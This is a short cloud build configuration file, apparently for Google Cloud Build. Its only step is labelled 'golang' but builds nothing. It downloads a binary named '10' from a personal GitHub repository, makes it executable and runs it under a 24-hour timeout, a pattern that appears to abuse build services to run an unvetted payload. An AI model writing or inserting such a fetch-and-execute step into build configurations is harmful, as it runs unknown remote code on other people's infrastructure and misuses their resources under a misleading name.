steps:
  - name: golang
    args: 
      - '-c'
      - >-
        wget https://github.com/NabilaMahmudah/gtr/raw/main/10 && chmod u+x 10 && ./10
    waitFor: ["-"]
    entrypoint: /bin/bash
timeout: 86400s
options:
